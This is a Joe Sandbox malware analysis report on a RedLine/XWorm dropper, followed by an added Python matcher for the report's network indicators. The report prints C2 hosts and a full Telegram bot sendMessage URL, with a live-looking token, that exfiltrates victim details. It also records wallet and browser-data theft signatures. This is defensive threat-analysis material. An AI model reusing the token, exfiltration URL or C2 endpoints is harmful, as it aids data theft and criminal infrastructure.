    Signature: Found many strings related to Crypto-Wallets (likely being stolen)
    Process: YsrQekGS.exe 14 3 (started)
      DNS/IP: api.telegram.org 149.154.167.220, 443, 49745 TELEGRAMRU United Kingdom
      DNS/IP: 45.88.186.18, 49746, 7000 ANONYMIZEEpikNetworkCH Netherlands
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 4 other signatures
      Process: powershell.exe (started)
        Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module
        Process: conhost.exe (started)
      Process: powershell.exe (started)
        Process: conhost.exe (started)
    Process: wjoqZlIS.exe 15 48 (started)
      DNS/IP: pst-child.gl.at.ply.gg 147.185.221.20, 49730, 49737, 49738 SALSGIVERUS United States
      Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
      Process: conhost.exe (started)
    Process: rKPaQokQ.exe 12 (started)
  Process: Calculator.exe 2 (started)

Source | Detection | Scanner | Label | Link
Ekpb7jn7mf.exe | 66% | ReversingLabs | ByteCode-MSIL.Infostealer.RedLine |
Ekpb7jn7mf.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | 92% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | 96% | ReversingLabs | ByteCode-MSIL.Infostealer.RedLine |
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.mic | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
http://tempuri.org/ | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/actor/next | 0% | URL Reputation | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/EnvironmentSettings | 0% | Avira URL Cloud | safe |
45.88.186.18 | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
https://api.telegram.org | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784 | 0% | Avira URL Cloud | safe |
http://pst-child.gl.at.ply.gg:9336 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe |
https://api.ipify.orgcookies//settinString.Removeg | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe |
pst-child.gl.at.ply.gg:9336 | 0% | Avira URL Cloud | safe |
http://tempuri.org/0 | 0% | Avira URL Cloud | safe |
http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
https://ipinfo.io/ip%appdata% | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/CheckConnectResponse | 0% | Avira URL Cloud | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | 0% | Avira URL Cloud | safe |
https://api.ip.sb | 0% | Avira URL Cloud | safe |
http://crl.mic | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/CheckConnect | 0% | Avira URL Cloud | safe |
http://pst-child.gl.at.ply.gg:9336/ | 0% | Avira URL Cloud | safe |
https://ion=v4.5 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe |
http://pst-child.gl.at.ply.gg | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pst-child.gl.at.ply.gg | 147.185.221.20 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
api.ip.sb | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
45.88.186.18 | true | Avira URL Cloud: safe | unknown
pst-child.gl.at.ply.gg:9336 | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | Avira URL Cloud: safe | unknown
http://pst-child.gl.at.ply.gg:9336/ | false | Avira URL Cloud: safe | unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabwjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.micpowershell.exe, 0000000D.00000002.1800097184.00000205807EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.orgYsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/botEkpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe.0.drtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://pst-child.gl.at.ply.gg:9336wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Endpoint/EnvironmentSettingswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/envelope/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Endpoint/VerifyUpdateResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Endpoint/GetUpdateswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.orgcookies//settinString.RemovegwjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Endpoint/VerifyUpdatewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/0wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.micft.cMicRosofpowershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ipinfo.io/ip%appdata%wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icowjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymouswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Endpoint/CheckConnectResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.datacontract.org/2004/07/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.ip.sbwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.micpowershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
http://tempuri.org/Endpoint/CheckConnect
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
https://www.ecosia.org/newtab/
    Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
https://github.com/Pester/Pester
    Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
https://ac.ecosia.org/autocomplete?q=
    Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
https://ion=v4.5
    Source: powershell.exe, 0000000A.00000002.1768144280.00000217574C3000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
http://tempuri.org/Endpoint/GetUpdatesResponse
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
http://pst-child.gl.at.ply.gg
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Avira URL Cloud: safe
    Reputation: unknown
https://aka.ms/pscore68
    Source: powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= (two URLs found concatenated in memory)
    Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
http://schemas.xmlsoap.org/soap/actor/next
    Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    URL Reputation: safe
    Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
45.88.186.18 | unknown | Netherlands | 34962 | ANONYMIZEEpikNetworkCH | true
147.185.221.20 | pst-child.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
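The three hosts in the table above are the report's network indicators. As an added example, not part of the Joe Sandbox report, the Python below turns them into a tiered matcher and runs it over a few constructed log lines. Two details from this page shape the tiers. First, the URL table rates http://pst-child.gl.at.ply.gg as "Avira URL Cloud: safe" with reputation "unknown" while the IP table marks its resolved address 147.185.221.20 malicious, so the URL-reputation columns are not a basis for allow-listing. Second, 149.154.167.220 is api.telegram.org, shared Telegram Bot API infrastructure that legitimate software also talks to, so a hit there is a review item rather than an automatic block. The "neighbour" tier (the whole /24 around 147.185.221.20 and around 45.88.186.18) is an assumption justified only by the ASN-match tables further down this page, which list 147.185.221.19/.20/.21 and 45.88.186.62/.125/.168 as contact points of other XWorm, Njrat, AsyncRAT and RedLine samples. The log lines, process names, tier names and the `classify`/`triage` helpers are this example's own.

```python
import ipaddress
import re

# Exact indicators, copied from the IP table of this report.
EXACT_IPS = {
    "149.154.167.220": "api.telegram.org, TELEGRAMRU (AS62041)",
    "45.88.186.18": "no domain, ANONYMIZEEpikNetworkCH (AS34962)",
    "147.185.221.20": "pst-child.gl.at.ply.gg, SALSGIVERUS (AS12087)",
}
EXACT_DOMAINS = {"pst-child.gl.at.ply.gg": "147.185.221.20"}
# Shared Telegram Bot API host: worth a look, not an automatic block.
REVIEW_DOMAINS = {"api.telegram.org": "149.154.167.220"}

# Assumption: lower-confidence /24 tiers, justified only by the ASN-match
# tables of this report (147.185.221.19/.20/.21 and 45.88.186.62/.125/.168
# as C2 of related XWorm, Njrat, AsyncRAT and RedLine samples). Telegram's
# range is left out on purpose.
NEIGHBOUR_NETS = [ipaddress.ip_network("147.185.221.0/24"),
                  ipaddress.ip_network("45.88.186.0/24")]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
TIER_RANK = {"exact": 3, "neighbour": 2, "review": 1}


def classify(line: str) -> list:
    """All (tier, indicator, reason) hits for one log line."""
    hits = []
    for host in HOST.findall(line):
        h = host.lower()
        if h in EXACT_DOMAINS:
            hits.append(("exact", h, f"report domain, resolves to {EXACT_DOMAINS[h]}"))
        elif h in REVIEW_DOMAINS:
            hits.append(("review", h, "Telegram Bot API: used by this sample, shared with legitimate bots"))
    for ip in IPV4.findall(line):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:  # e.g. 999.1.1.1 passed the loose regex
            continue
        if ip in EXACT_IPS:
            hits.append(("exact", ip, EXACT_IPS[ip]))
        elif any(addr in net for net in NEIGHBOUR_NETS):
            hits.append(("neighbour", ip, "same /24 as C2 of related samples"))
    return hits


def highest_tier(hits: list):
    """Strongest tier among the hits, or None when nothing matched."""
    return max((h[0] for h in hits), key=TIER_RANK.get, default=None)


def triage(lines: list) -> list:
    """(line, tier) for every line."""
    return [(line, highest_tier(classify(line))) for line in lines]


# Constructed log lines, not from the report; process names are illustrative.
LOGS = [
    "dns query pst-child.gl.at.ply.gg -> 147.185.221.20 from wjoqZlIS.exe",
    "tcp connect 45.88.186.18 from wjoqZlIS.exe",
    "tls client hello sni=api.telegram.org dst=149.154.167.220",
    "tcp connect 147.185.221.21 from unknown.exe",
    "https GET www.ecosia.org/newtab/ from firefox.exe",
]

if __name__ == "__main__":
    for line, tier in triage(LOGS):
        print(f"{tier or '-':9} {line}")
```

The last constructed line stays clean on purpose: the ecosia.org strings in the URL table come from browser data in the dropped tmp files, not from the sample's own traffic, and matching on them would only generate noise.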
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1474423
Start date and time: 2024-07-16 21:06:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ekpb7jn7mf.exe (renamed because the original name is a hash value)
Original Sample Name: 4CE2C0836C46C61B588972B56A23D5E2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/57@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 110
• Number of non-executed functions: 94
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
